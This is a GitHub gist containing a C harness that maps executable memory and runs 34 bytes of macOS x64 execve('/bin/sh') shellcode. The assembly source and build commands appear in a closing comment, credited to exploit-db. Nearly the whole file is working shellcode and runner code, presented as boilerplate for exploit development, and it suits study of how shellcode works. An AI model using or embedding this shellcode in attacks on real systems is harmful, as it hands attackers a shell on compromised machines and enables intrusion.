Created
September 14, 2016 12:45
-
-
Save wtfbbqhax/d419f1ca747c436c6ff0a5c663b94de0 to your computer and use it in GitHub Desktop.
Beauty and the Bin/sh
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// * .,.. _ _ _ | |
// ` ,:':::` | | (_) | | | |
// :: ::::=. . | |__ _ _ __ ___| |__ ___ | |
// \.:|| .::::| :: | '_ \| | '_ \ / __| '_ \ / __| | |
// /_.|| .:::::u::: * | |_) | | | | |\__ \ | | || (__ | |
// .- ||______:::: . |_.__/|_|_| |_||___/_| |_(_)___| | |
// '-------::' | |
// \_\= /'::.':' | |
// ///_ - --_ Victor Roemer (wtfbbqhax), <victor@badsec.org>. | |
///._\=---- Wrote sometime between 2014-2015 | |
// | |
// Original shellcode was obtained from exploit-db.com, can be seen in the | |
// comment block following main(). | |
/* Q: Is it the last shellcode boiler-plate you'll ever use again?? */ | |
#include <stdio.h> | |
#include <sys/mman.h> | |
#include <string.h> | |
typedef void (*Func_t)(void); | |
typedef char const ByteCode[]; | |
#define PROT_RWX (PROT_READ|PROT_WRITE|PROT_EXEC) | |
#define MAP_MINE (MAP_ANON|MAP_PRIVATE) | |
Func_t _NewFunc (ByteCode code, size_t size) | |
{ | |
void * ret = mmap(0, size, PROT_RWX, MAP_MINE, -1, 0); | |
if ( ret == MAP_FAILED ) | |
return NULL; | |
memcpy(ret, code, size); | |
return (Func_t)ret; | |
} | |
#define NewFunc(code) _NewFunc(code, sizeof(code)); | |
int main(int argc, char *argv[]) | |
{ | |
ByteCode shellcode = { | |
0x48, 0x31, 0xf6, 0x56, 0x48, 0xbf, 0x2f, 0x2f, | |
0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x57, 0x48, | |
0x89, 0xe7, 0x48, 0x31, 0xd2, 0x48, 0x31, 0xc0, | |
0xb0, 0x02, 0x48, 0xc1, 0xc8, 0x28, 0xb0, 0x3b, | |
0x0f, 0x05 | |
}; | |
Func_t binsh = NewFunc( shellcode ); | |
binsh( ); | |
return 0; | |
} | |
//////////////////////////////////////////// Original Shellcode ////////////// | |
/* | |
[*] Author: Csaba Fitzl, @theevilbit | |
[*] Tested on OS X 10.10.5 | |
[*] OS X x64 /bin/sh shellcode, NULL byte free, 34 bytes | |
[*] Assembly version | |
[*] binsh-shellcode.asm | |
[*] ./nasm -f macho64 binsh-shellcode.asm | |
[*] ld -macosx_version_min 10.7.0 -o binsh-shellcode binsh-shellcode.o | |
------------------------------------------------------------------------------- | |
BITS 64 | |
global start | |
section .text | |
start: | |
xor rsi,rsi ;zero out RSI | |
push rsi ;push NULL on stack | |
mov rdi, 0x68732f6e69622f2f ;mov //bin/sh string to RDI (reverse) | |
push rdi ;push rdi to the stack | |
mov rdi, rsp ;store RSP (points to the command string) in RDI | |
xor rdx, rdx ;zero out RDX | |
;store syscall number on RAX | |
xor rax,rax ;zero out RAX | |
mov al,2 ;put 2 to AL -> RAX = 0x0000000000000002 | |
ror rax, 0x28 ;rotate the 2 -> RAX = 0x0000000002000000 | |
mov al,0x3b ;move 3b to AL (execve SYSCALL#) -> RAX = 0x000000000200003b | |
syscall ;trigger syscall | |
------------------------------------------------------------------------------- | |
[*] C version | |
[*] Get the hex opcodes from the object file: otool -t binsh-shellcode.o | |
[*] binsh-shellcode.c | |
[*] Compile: gcc binsh-shellcode.c -o sc | |
[*] Run: ./sc | |
*/ | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment